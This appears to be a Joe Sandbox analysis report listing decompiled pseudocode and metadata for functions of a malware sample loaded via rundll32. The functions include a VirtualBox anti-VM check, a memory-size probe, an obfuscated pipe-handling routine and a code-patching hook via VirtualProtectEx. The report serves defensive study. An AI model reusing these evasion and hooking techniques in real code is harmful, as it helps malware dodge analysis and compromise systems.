                Function 00000215205CD990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33shareCOMMON
                Download Yara Rule
                C-Code - Quality: 43%
                			E00000215215205CD990() {
				signed int _v24;
				char _v552;
				intOrPtr _v568;
				int _t11;
				void* _t14;
				void* _t19;
				void* _t20;
				signed long long _t24;
				void* _t30;
				void* _t33;
				signed long long _t34;
				void* _t35;
				void* _t37;

				_t24 =  *0x2067c720; // 0xca1645d940e
				_v24 = _t24 ^ _t34;
				r8d = 0x208;
				E00000215215205F8EF0(_t14, 0, _t19, _t20,  &_v552, _t30, _t33, _t35);
				_v568 = 0x104;
				_t11 = WNetGetProviderNameW(??, ??, ??); // executed
				if (_t11 != 0) goto 0x205cda0f;
				__imp__StrCmpIW();
				return E00000215215205F59D0(0 | _t11 == 0x00000000, _v24 ^ _t34, L"VirtualBox Shared Folders", _t37);
			}
















                0x215205cd997
                0x215205cd9a1
                0x215205cd9b0
                0x215205cd9b6
                0x215205cd9c0
                0x215205cd9d2
                0x215205cd9da
                0x215205cd9e8
                0x215205cda0e

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: NameProvider
                • String ID: VirtualBox Shared Folders
                • API String ID: 262172401-2247368375
                • Opcode ID: 58885f4abb19d5f845a99889267d7b302267c01fe6a5ffc64e6a71858df7a291
                • Instruction ID: d9cf175afdad96f9e2aab2302c86142ab49aa66a9cca91f2c1473cf59434ecd7
                • Opcode Fuzzy Hash: 58885f4abb19d5f845a99889267d7b302267c01fe6a5ffc64e6a71858df7a291
                • Instruction Fuzzy Hash: B6012C76315E90C2FB749B24E85D3EA6390FBE9755FC000569A8E92699EF7CD105CA00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E33BC Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E00007FFA7FFA535E33BC(void* __ecx) {
				void* __rbx;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t19;
				void* _t20;

				_t8 = __ecx;
				E00007FFA7FFA535E3914(_t7, _t9, ( *0x53754b08 & 0x000000ff) + 0x17172f, 0x1, _t19, _t20);
				if (E00007FFA7FFA535E42EC() != 0) goto 0x535e33eb;
				goto 0x535e33ff; // executed
				E00007FFA7FFA535E7DD4(( *0x53754b08 & 0x000000ff) + 0x17172f); // executed
				if (0 != 0) goto 0x535e33fd;
				E00007FFA7FFA535E4348(_t8);
				goto 0x535e33e7;
				return _t7;
			}









                0x7ffa535e33bc
                0x7ffa535e33d9
                0x7ffa535e33e5
                0x7ffa535e33e9
                0x7ffa535e33eb
                0x7ffa535e33f2
                0x7ffa535e33f6
                0x7ffa535e33fb
                0x7ffa535e3404

                APIs
                • __isa_available_init.LIBCMT ref: 00007FFA535E33D9
                • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFA535E33DE
                  • Part of subcall function 00007FFA535E42EC: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFA535E42F0
                  • Part of subcall function 00007FFA535E42EC: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFA535E42F5
                  • Part of subcall function 00007FFA535E42EC: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFA535E42FA
                • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFA535E33F6
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                • String ID:
                • API String ID: 3388242289-0
                • Opcode ID: 9f98b25316a4bfb7b7888dd646c33a76e946e665d901a34c7cd22b4946b12760
                • Instruction ID: a76ceec288fbaf6dc7bb4001ceb0d604b93e307e3b988afb1047b141132d1c70
                • Opcode Fuzzy Hash: 9f98b25316a4bfb7b7888dd646c33a76e946e665d901a34c7cd22b4946b12760
                • Instruction Fuzzy Hash: 86E01250D3DB424DFE5927E11082AB8275A0F9B301F4DE0F5D95D72183CD0D6599B521
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060C3C8 Relevance: 3.8, APIs: 3, Instructions: 46COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 65%
                			E000002152152060C3C8(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r9, long long _a8, long long _a16) {
				void* _t6;
				void* _t11;
				intOrPtr _t13;
				intOrPtr _t16;
				void* _t27;
				void* _t33;
				void* _t36;

				_t33 = __rdx;
				_t31 = __rcx;
				_t29 = __rbx;
				_t27 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				GetLastError();
				_t13 =  *0x2067c964; // 0xffffffff
				if (_t13 == 0xffffffff) goto 0x2060c3f9;
				_t6 = E000002152152060C9F4(_t13, _t13 - 0xffffffff, __rax, __rbx, __rcx);
				if (__rax != 0) goto 0x2060c43a;
				E0000021521520607C38(_t6, _t31, _t33); // executed
				_t36 = _t27;
				if (_t27 != 0) goto 0x2060c419;
				E000002152152060A780(_t27, _t31);
				goto 0x2060c43f;
				_t16 =  *0x2067c964; // 0xffffffff
				if (E000002152152060CA4C(_t16, _t27, _t27, _t29, _t31, _t27, __rsi) == 0) goto 0x2060c412;
				E000002152152060C0A0(_t36, _t27);
				_t11 = E000002152152060A780(_t27, _t36);
				if (_t36 != 0) goto 0x2060c449;
				SetLastError(??);
				goto 0x2060c454;
				SetLastError(??);
				return _t11;
			}










                0x2152060c3c8
                0x2152060c3c8
                0x2152060c3c8
                0x2152060c3c8
                0x2152060c3c8
                0x2152060c3cd
                0x2152060c3d7
                0x2152060c3dd
                0x2152060c3ea
                0x2152060c3ec
                0x2152060c3f7
                0x2152060c403
                0x2152060c408
                0x2152060c40e
                0x2152060c412
                0x2152060c417
                0x2152060c419
                0x2152060c42c
                0x2152060c42e
                0x2152060c435
                0x2152060c43d
                0x2152060c441
                0x2152060c447
                0x2152060c44b
                0x2152060c466

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast
                • String ID:
                • API String ID: 1452528299-0
                • Opcode ID: bfdaeda6932f48ca5ff48361fe3939014b449c0591b6a111b209979d48e3d4ba
                • Instruction ID: 2b8271b2d37816b55eaf26bc4cde937980f6b1541e484b6713bc838b0af0f71c
                • Opcode Fuzzy Hash: bfdaeda6932f48ca5ff48361fe3939014b449c0591b6a111b209979d48e3d4ba
                • Instruction Fuzzy Hash: DA117032283F60C1FA78A765652D3BA1293BFE4BE0F6445A89D0A177DEDD38E44A4300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CF9F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E00000215215205CF9F0() {
				signed int _v24;
				intOrPtr _v28;
				void* _v80;
				intOrPtr _v88;
				void* _t20;
				signed long long _t23;
				signed long long _t24;
				void* _t29;
				signed long long _t30;
				void* _t31;
				signed long long _t32;

				_t32 = _t30;
				_t23 =  *0x2067c720; // 0xca1645d940e
				_t24 = _t23 ^ _t30;
				_v24 = _t24;
				 *(_t32 - 0x54) = _t24;
				 *(_t32 - 0x4c) = _t24;
				 *(_t32 - 0x44) = _t24;
				 *(_t32 - 0x3c) = _t24;
				 *(_t32 - 0x34) = _t24;
				 *(_t32 - 0x2c) = _t24;
				 *(_t32 - 0x24) = _t24;
				_v28 = 0;
				_v88 = 0x40;
				GlobalMemoryStatusEx(??); // executed
				return E00000215215205F59D0(_t20, _v24 ^ _t30, _t29, _t31);
			}














                0x215205cf9f0
                0x215205cf9f7
                0x215205cf9fe
                0x215205cfa01
                0x215205cfa0c
                0x215205cfa10
                0x215205cfa14
                0x215205cfa18
                0x215205cfa1c
                0x215205cfa20
                0x215205cfa24
                0x215205cfa28
                0x215205cfa2c
                0x215205cfa34
                0x215205cfa5f

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID: @
                • API String ID: 1890195054-2766056989
                • Opcode ID: 2ecb87edcf64bce3e4ea576f9fe6ad7bb7e3c930542fbaf679872767e05fdeb0
                • Instruction ID: b681f89a967a78234ccfd654e9a5056eec856c4d10401cd12bc3e9c163f808dc
                • Opcode Fuzzy Hash: 2ecb87edcf64bce3e4ea576f9fe6ad7bb7e3c930542fbaf679872767e05fdeb0
                • Instruction Fuzzy Hash: 7FF0E23771AF50C9EB90CB22A81938D33E5F79C750F924139DA9D82714EF3995218F04
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E1CF8 Relevance: 3.3, APIs: 2, Instructions: 312pipethreadCOMMON
                Download Yara Rule
                C-Code - Quality: 73%
                			E00007FFA7FFA535E1CF8(void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9) {
				void* __rsi;
				void* __rbp;
				long _t198;
				void* _t212;
				void* _t217;
				signed int _t232;
				signed int _t235;
				signed int _t247;
				signed int _t251;
				signed long long _t266;
				signed int _t273;
				intOrPtr* _t274;
				void* _t286;
				intOrPtr _t301;
				signed long long _t340;
				signed long long _t342;
				signed long long _t357;
				signed int _t364;
				intOrPtr* _t368;
				signed int _t369;
				void* _t371;
				void* _t372;
				void* _t379;
				long long _t384;
				void* _t386;
				void* _t389;

				_t374 = __r8;
				 *((long long*)(_t371 + 0x10)) = __rbx;
				 *((long long*)(_t371 + 0x18)) = __r8;
				_t368 = _t371 - 7;
				_t372 = _t371 - 0x90;
				_t384 =  *0x5367c000; // 0x2151e49def0
				_t286 = __rcx;
				r14d = 0x1fda;
				r9d = 0x1c76;
				r8d = 0x1320;
				 *((long long*)(_t384 + 0x3a8)) =  *((intOrPtr*)(_t384 + 0x290));
				_t6 = _t384 + 0x21e; // 0x2151e49e10e
				 *(_t372 + 0x28) = _t6;
				_t232 =  *((intOrPtr*)(_t384 + 0x290));
				 *(_t372 + 0x20) = _t232;
				E00007FFA7FFA535E1000(_t232, _t384, __r8, _t389, _t386); // executed
				 *((long long*)(_t384 + 0x628)) =  *(_t368 + 0x77);
				if (_t286 !=  *((intOrPtr*)(_t384 + 0x308))) goto 0x535e2162;
				_t198 = GetCurrentThreadId();
				 *(_t384 + 0x200) = _t198;
				if (_t232 == 0) goto 0x535e2162;
				 *(_t368 - 1) = 0;
				asm("push ds");
				 *0x1569 =  *0x1569 + _t198;
				 *(_t368 - 5) = 0;
				 *(_t368 - 0xd) = 0x651;
				 *(_t368 - 9) = 0;
				 *(_t368 + 0x47) = r14d;
				r14d = 0xc92;
				 *(_t368 - 0x15) = 0;
				 *(_t368 + 0x77) = 0;
				 *(_t368 - 0x11) =  *(_t368 - 0x11) + 0xfffff5c7;
				r8d =  *(_t368 - 0x19);
				r9d =  *(_t368 - 0x15);
				r8d = r8d + 0x10ae;
				r9d = r9d + _t198;
				r11d =  *(_t368 - 0xd);
				r11d = r11d + 0xe36;
				r10d = r10d + _t198;
				_t235 =  *(_t368 - 0x19);
				 *(_t372 + 0x50) = _t235;
				 *(_t372 + 0x48) = r10d;
				 *((long long*)(_t372 + 0x40)) = _t384;
				 *(_t372 + 0x38) = r11d;
				 *(_t372 + 0x30) =  *(_t368 - 1);
				 *(_t372 + 0x28) =  *(_t368 - 9) + 0x1569;
				 *(_t372 + 0x20) =  *(_t368 - 0x11) - 0x8cc;
				E00007FFA7FFA535F5694(_t235,  *(_t368 - 1),  *(_t368 + 0x47) - 0xf2c,  *(_t368 - 0xd) + 0x1556,  *(_t368 - 0x11) - 0x8cc, _t374); // executed
				 *(_t368 - 1) = _t235;
				if ( *(_t368 + 0x47) ==  *(_t368 + 0x77) + 0x1ad7) goto 0x535e214d;
				if ( *(_t368 - 0xd) -  *(_t368 + 0x47) + 0xfffff37b >= 0) goto 0x535e1fcf;
				r9d = 0x1515;
				 *((long long*)(_t384 + 0x4a0)) =  *((intOrPtr*)(_t384 + 0xe8)) -  *((intOrPtr*)(_t384 + 0xf0));
				_t301 =  *((intOrPtr*)(_t384 + 0x2a0));
				 *((intOrPtr*)(_t384 + 0x390)) =  *((intOrPtr*)(_t384 + 0x390)) -  *(_t301 + 0x448) * 0x1515;
				 *(_t301 + 0x330) =  *(_t301 + 0x330) ^ ( *(_t384 + 0x5e0) | 0x00001320);
				 *( *((intOrPtr*)(_t384 + 0x108)) + 0x378) =  *( *((intOrPtr*)(_t384 + 0x108)) + 0x378) ^  *((intOrPtr*)(_t384 + 0x110)) + 0x00000478;
				 *(_t368 - 0x19) =  *(_t368 - 0x19) + r9d;
				if ( *(_t368 - 0xd) ==  *(_t368 - 0x19) + 0xe8) goto 0x535e214d;
				 *(_t368 - 0x15) =  *(_t368 - 0x15) + 0x1c76;
				 *(_t368 + 0x77) =  *(_t368 + 0x77) + r14d;
				r8d =  *(_t368 - 0x19);
				r12d =  *(_t368 - 1);
				r8d = r8d + 0x692;
				r15d =  *(_t368 - 0x15);
				r12d = r12d + 0x771;
				r14d =  *(_t368 - 0x11);
				r15d = r15d - 0x1625;
				r14d = r14d - 0xe36;
				_t364 =  *(_t368 - 0x11) + 0x8e;
				r11d =  *(_t368 + 0x47);
				r10d =  *(_t368 + 0x77);
				r11d = r11d - 0xc85;
				r9d =  *(_t368 - 0xd);
				r10d = r10d + 0xeb5;
				r9d = r9d + 0x1ac3;
				_t247 =  *(_t368 + 0x47) - 0x1348;
				 *(_t372 + 0x68) = _t247;
				 *(_t372 + 0x60) = r9d;
				 *(_t372 + 0x58) = r10d;
				 *(_t372 + 0x50) = r11d;
				 *(_t372 + 0x48) =  *(_t368 - 5);
				 *((long long*)(_t372 + 0x40)) =  *(_t368 + 0x47) - 0xac5;
				 *(_t372 + 0x38) = _t364;
				 *(_t372 + 0x30) = r14d;
				 *(_t372 + 0x28) = r15d;
				 *(_t372 + 0x20) = r12d;
				E00007FFA7FFA535F59E8(_t247,  *(_t368 - 5),  *(_t368 + 0x47) - 0x1989,  *(_t368 - 0x15) - 0x7ef, _t364, _t374, _t384, _t379);
				 *(_t368 - 0x15) = _t247;
				 *(_t368 + 0x77) =  *(_t368 + 0x77) + 0xe45;
				 *(_t368 + 0x47) =  *(_t368 + 0x47) + 0xfffffbcd;
				goto 0x535e214d;
				if (_t364 -  *(_t368 - 9) >= 0) goto 0x535e214d;
				r12d = 0x1fda;
				r9d =  *(_t368 - 0x19);
				r8d =  *(_t384 + 0x2a8);
				r9d = r9d |  *(_t384 + 0x198);
				asm("inc ebp");
				r10d =  *(_t368 - 0x11);
				_t357 =  *(_t368 + 0x47) - 0x000016ce & 0x000010ae;
				r11d =  *(_t384 + 0x90);
				_t251 =  *(_t368 - 9);
				r11d = r11d +  *((intOrPtr*)(_t384 + 0x240));
				r10d = r10d -  *((intOrPtr*)(_t384 + 0x158));
				r11d = r11d & r12d;
				 *((long long*)(_t372 + 0x40)) =  *(_t368 + 0x77) + _t251;
				 *(_t372 + 0x38) = r10d;
				 *(_t372 + 0x30) = r11d;
				 *(_t372 + 0x28) =  *(_t368 - 0x11);
				 *(_t372 + 0x20) = _t357;
				E00007FFA7FFA535F615C(_t251,  *(_t368 - 0x11),  *(_t368 - 0xd) *  *(_t368 - 0x19), _t384, _t374, _t384);
				 *(_t368 - 0xd) = _t251;
				asm("adc eax, 0x19ff6");
				 *(_t368 - 0x19) =  *(_t368 - 0x15) + 0x15fd;
				 *(_t368 - 5) =  *(_t368 - 5) - ( *(_t368 + 0x77) &  *(_t368 - 5) *  *(_t368 - 0x19));
				 *((long long*)(_t384 + 0x1a8)) =  *(_t368 - 0xd) +  *(_t368 - 0x15);
				_t340 =  *((intOrPtr*)(_t384 + 0x300)) +  *(_t368 - 0x11);
				 *(_t384 + 0x188) =  *(_t384 + 0x188) * _t340;
				 *(_t368 - 9) =  *(_t368 - 9) ^  *(_t368 + 0x77) ^ 0x00000bbb;
				_t342 = _t340 &  *(_t368 - 9) & 0x00000651;
				_t266 =  *(_t368 + 0x77) | _t342;
				 *(_t368 + 0x77) = _t266;
				 *(_t384 + 0x248) = _t266 & 0x00001b47;
				 *(_t368 - 0x15) =  *(_t368 - 0x15) -  *(_t368 + 0x47) *  *(_t384 + 0x70);
				if (_t364 + 2 -  *(_t368 - 9) < 0) goto 0x535e1fea;
				 *((long long*)( *((intOrPtr*)(_t368 + 0x57)))) =  *((intOrPtr*)(_t384 + 0xe8));
				goto 0x535e2281;
				_t273 =  *(_t384 + 0x5e8);
				r14d = 0xc92;
				 *((intOrPtr*)( *((intOrPtr*)(_t384 + 0x108)) + 0x1c0)) =  *((intOrPtr*)( *((intOrPtr*)(_t384 + 0x108)) + 0x1c0)) + _t386 -  *((intOrPtr*)(_t273 + 0x298));
				 *0xA0858B49000013E7 =  *((intOrPtr*)(0xa0858b49000013e7)) + _t217;
				_t274 = _t368;
				_t369 = _t273;
				asm("pushad");
				 *_t274 =  *_t274 + _t274;
				 *((intOrPtr*)(_t274 + 0x2b)) =  *((intOrPtr*)(_t274 + 0x2b)) + _t217;
				 *((intOrPtr*)(_t274 + 0x48000002)) = spl;
				 *((intOrPtr*)(_t342 + 0x1c8)) =  *((intOrPtr*)(_t342 + 0x1c8)) + 0x145c;
				 *( *((intOrPtr*)(_t384 + 0x160)) + 0x2f8) =  *( *((intOrPtr*)(_t384 + 0x160)) + 0x2f8) ^  *((intOrPtr*)(_t384 + 0x2a0)) + 0x00000128;
				 *(_t372 + 0x48) =  *((intOrPtr*)(_t369 + 0x8f));
				 *((long long*)(_t372 + 0x40)) =  *((intOrPtr*)(_t369 + 0x87));
				 *(_t372 + 0x38) =  *((intOrPtr*)(_t369 + 0x7f));
				 *(_t372 + 0x30) = _t357;
				 *(_t372 + 0x28) =  *((intOrPtr*)(_t369 + 0x6f));
				 *(_t372 + 0x20) =  *((intOrPtr*)(_t369 + 0x67));
				 *((intOrPtr*)(_t384 + 0x3a8))();
				r9d = 0x1569;
				r8d = 0x1b47;
				 *((long long*)( *((intOrPtr*)(_t384 + 0x2a0)) + 0x4b0)) =  *((intOrPtr*)( *((intOrPtr*)(_t384 + 0x20)) + 0x1a8)) - 0x1320;
				 *( *((intOrPtr*)(_t384 + 0x240)) + 0xa0) =  *( *((intOrPtr*)(_t384 + 0x240)) + 0xa0) |  *(_t384 + 0x5e8);
				_t188 = _t384 + 0x272; // 0x2151e49e162
				 *((intOrPtr*)(_t188 - 0x75)) =  *((intOrPtr*)(_t188 - 0x75)) - _t217;
				asm("int 0x48");
				 *(_t372 + 0x20) =  *((intOrPtr*)(_t384 + 0x290));
				_t212 = E00007FFA7FFA535E1000( *((intOrPtr*)(_t384 + 0x290)), _t188, _t364 + 2);
				 *((long long*)( *((intOrPtr*)(_t384 + 0x108)) + 0x230)) =  *((long long*)( *((intOrPtr*)(_t384 + 0x108)) + 0x230)) + 0xfffff6f4;
				return _t212;
			}





























                0x7ffa535e1cf8
                0x7ffa535e1cf8
                0x7ffa535e1cfd
                0x7ffa535e1d0d
                0x7ffa535e1d12
                0x7ffa535e1d19
                0x7ffa535e1d29
                0x7ffa535e1d2c
                0x7ffa535e1d32
                0x7ffa535e1d42
                0x7ffa535e1d48
                0x7ffa535e1d52
                0x7ffa535e1d59
                0x7ffa535e1d5e
                0x7ffa535e1d65
                0x7ffa535e1d6a
                0x7ffa535e1d73
                0x7ffa535e1d81
                0x7ffa535e1d87
                0x7ffa535e1d8f
                0x7ffa535e1d98
                0x7ffa535e1d9e
                0x7ffa535e1db3
                0x7ffa535e1db4
                0x7ffa535e1db6
                0x7ffa535e1db9
                0x7ffa535e1dc0
                0x7ffa535e1dc3
                0x7ffa535e1dc7
                0x7ffa535e1dcd
                0x7ffa535e1dd0
                0x7ffa535e1dd3
                0x7ffa535e1de6
                0x7ffa535e1df0
                0x7ffa535e1df4
                0x7ffa535e1dfe
                0x7ffa535e1e0f
                0x7ffa535e1e1c
                0x7ffa535e1e23
                0x7ffa535e1e29
                0x7ffa535e1e2f
                0x7ffa535e1e33
                0x7ffa535e1e38
                0x7ffa535e1e3d
                0x7ffa535e1e42
                0x7ffa535e1e46
                0x7ffa535e1e4a
                0x7ffa535e1e4e
                0x7ffa535e1e53
                0x7ffa535e1e64
                0x7ffa535e1e78
                0x7ffa535e1e85
                0x7ffa535e1e92
                0x7ffa535e1e99
                0x7ffa535e1eab
                0x7ffa535e1ebf
                0x7ffa535e1eda
                0x7ffa535e1ee1
                0x7ffa535e1ef3
                0x7ffa535e1ef9
                0x7ffa535e1f00
                0x7ffa535e1f10
                0x7ffa535e1f1a
                0x7ffa535e1f1e
                0x7ffa535e1f25
                0x7ffa535e1f29
                0x7ffa535e1f30
                0x7ffa535e1f34
                0x7ffa535e1f3e
                0x7ffa535e1f48
                0x7ffa535e1f57
                0x7ffa535e1f5e
                0x7ffa535e1f62
                0x7ffa535e1f69
                0x7ffa535e1f6d
                0x7ffa535e1f77
                0x7ffa535e1f7e
                0x7ffa535e1f83
                0x7ffa535e1f87
                0x7ffa535e1f8f
                0x7ffa535e1f94
                0x7ffa535e1f99
                0x7ffa535e1f9d
                0x7ffa535e1fa1
                0x7ffa535e1fa5
                0x7ffa535e1faa
                0x7ffa535e1faf
                0x7ffa535e1fb4
                0x7ffa535e1fb9
                0x7ffa535e1fbc
                0x7ffa535e1fc3
                0x7ffa535e1fca
                0x7ffa535e1fde
                0x7ffa535e1fe4
                0x7ffa535e1ff3
                0x7ffa535e1ffa
                0x7ffa535e2001
                0x7ffa535e2014
                0x7ffa535e201b
                0x7ffa535e201f
                0x7ffa535e2028
                0x7ffa535e202f
                0x7ffa535e203c
                0x7ffa535e2043
                0x7ffa535e204a
                0x7ffa535e204d
                0x7ffa535e2054
                0x7ffa535e2059
                0x7ffa535e205e
                0x7ffa535e2062
                0x7ffa535e2066
                0x7ffa535e206b
                0x7ffa535e208d
                0x7ffa535e209a
                0x7ffa535e20ab
                0x7ffa535e20b8
                0x7ffa535e20ca
                0x7ffa535e20d8
                0x7ffa535e20f0
                0x7ffa535e2104
                0x7ffa535e210a
                0x7ffa535e210d
                0x7ffa535e212c
                0x7ffa535e2139
                0x7ffa535e2147
                0x7ffa535e2158
                0x7ffa535e215d
                0x7ffa535e2162
                0x7ffa535e2169
                0x7ffa535e2183
                0x7ffa535e2195
                0x7ffa535e2198
                0x7ffa535e2198
                0x7ffa535e2199
                0x7ffa535e219a
                0x7ffa535e219c
                0x7ffa535e219f
                0x7ffa535e21a5
                0x7ffa535e21c2
                0x7ffa535e21d2
                0x7ffa535e21dc
                0x7ffa535e21e3
                0x7ffa535e21eb
                0x7ffa535e21f0
                0x7ffa535e21f9
                0x7ffa535e21fe
                0x7ffa535e2209
                0x7ffa535e2211
                0x7ffa535e222c
                0x7ffa535e2241
                0x7ffa535e2248
                0x7ffa535e225f
                0x7ffa535e2262
                0x7ffa535e2264
                0x7ffa535e2268
                0x7ffa535e2274
                0x7ffa535e229b

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ProtectVirtual$CurrentNamedPipeSectionThreadViewWait
                • String ID:
                • API String ID: 922581720-0
                • Opcode ID: 043ec0deaac45b4c4069053e4fb17e1d3b4759086a301924f66aaf3b6465b002
                • Instruction ID: 3dd6035aafc7f54cdc7b52366728d3d791a9c11baef9463d68be2a2903e1fcca
                • Opcode Fuzzy Hash: 043ec0deaac45b4c4069053e4fb17e1d3b4759086a301924f66aaf3b6465b002
                • Instruction Fuzzy Hash: 13F15A73B14A848FE754CF69D484AAE37B9FB88788F114125EE4DA7B58DB38D910CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CA568 Relevance: 3.1, APIs: 2, Instructions: 134COMMON
                Download Yara Rule
                C-Code - Quality: 29%
                			E00000215215205CA568(signed int __rax, long long __rbx, void* __rcx, long long __rdx, long long __r8, signed int __r9, long long _a8, char _a24, intOrPtr _a25, char _a28, signed int _a32) {
				long long _v40;
				void* __rsi;
				void* __rbp;
				signed char _t56;
				int _t61;
				void* _t65;
				void* _t66;
				void* _t73;
				void* _t75;
				void* _t78;
				void* _t81;
				signed char _t88;
				signed long long _t92;
				long long _t94;
				void* _t97;
				signed long long _t107;
				intOrPtr* _t108;
				signed long long _t109;
				intOrPtr* _t111;
				void* _t117;
				long long _t118;
				void* _t119;
				long long _t120;
				char* _t126;
				intOrPtr* _t128;

				_a8 = __rbx;
				_a32 = __r9;
				_a24 = __r8;
				r9d = r9d | 0xffffffff;
				r10d = 0;
				_t75 =  *0x2068332c - r10d; // 0xa
				_t118 = __rdx;
				_t97 = __rcx;
				if (_t75 <= 0) goto 0x205ca5f2;
				_t107 = __rax * 0x3c;
				_t92 =  *0x20683320; // 0x2151e660000
				if ( *((char*)(_t107 + _t92)) == 0) goto 0x205ca5df;
				if ( *((intOrPtr*)(_t107 + _t92 + 0x28)) != __rdx) goto 0x205ca5df;
				_t108 =  *((intOrPtr*)(_t107 + _t92 + 0x30));
				r8d = 0;
				_t78 =  *_t108 - r8d;
				if (_t78 <= 0) goto 0x205ca5d9;
				asm("lock bts dword [ecx+edx+0x4], 0x0");
				if (_t78 >= 0) goto 0x205ca5d6;
				r8d = r8d + 1;
				if (r8d -  *_t108 < 0) goto 0x205ca5bc;
				goto 0x205ca5d9;
				r9d = r8d;
				if (r9d != 0xffffffff) goto 0x205ca5ed;
				r10d = r10d + 1;
				_t81 = r10d -  *0x2068332c; // 0xa
				if (_t81 < 0) goto 0x205ca594;
				if (_t108 != 0) goto 0x205ca612;
				E00000215215205CA884(_t66, _t92, __rcx, __rdx, __rdx, _t119); // executed
				_t109 = _t92;
				if (_t92 == 0) goto 0x205ca616;
				 *_t92 = 0x42;
				r9d = 0;
				 *((intOrPtr*)(_t92 + 4)) = 1;
				 *(_t97 + 0x38) = r9d;
				 *(_t97 + 0x30) = _t109;
				if (_t109 != 0) goto 0x205ca626;
				goto 0x205ca73a;
				r8d = 0x2c;
				_t117 = _t92 * 0x3e + _t109;
				_t13 = _t117 + 0x16; // 0x16
				_t120 = _t13;
				E00000215215205CA828(0x90, _t120);
				_t56 = E00000215215205CB0D8(_t65, 0x90, _t73, _t97,  *((intOrPtr*)(_t97 + 1)), _t120);
				 *(_t97 + 9) = _t56 & 0x000000ff;
				if (_t56 != 0) goto 0x205ca660;
				 *(_t117 + 4) =  *(_t117 + 4) & 0x00000000;
				goto 0x205ca61f;
				_t111 =  *((intOrPtr*)(_t97 + 1));
				_t126 = _t97 + 0xa;
				if (_t126 == 0) goto 0x205ca686;
				if (_t111 == 0) goto 0x205ca686;
				_t88 = _t56;
				if (_t88 == 0) goto 0x205ca686;
				 *_t126 =  *_t111;
				if (_t88 != 0) goto 0x205ca676;
				 *((long long*)(_t97 + 0x28)) = _t118;
				_t21 = _t117 + 4; // 0x4
				 *0x206830a0 = _t120;
				 *(_t117 + 0xa) =  *(_t117 + 0xa) & 0x00000000;
				_a25 = _t21 -  *((intOrPtr*)(_t97 + 1)) - 1;
				r9d = 0x40;
				 *((short*)(_t117 + 8)) = 0x25ff;
				 *((long long*)(_t117 + 0xe)) = 0x21520587db0;
				r8d =  *(_t97 + 9) & 0x000000ff;
				_t94 =  &_a32;
				_v40 = _t94;
				_a24 = 0xe9;
				_t61 = VirtualProtectEx(??, ??, ??, ??, ??); // executed
				if (_t61 == 0) goto 0x205ca65a;
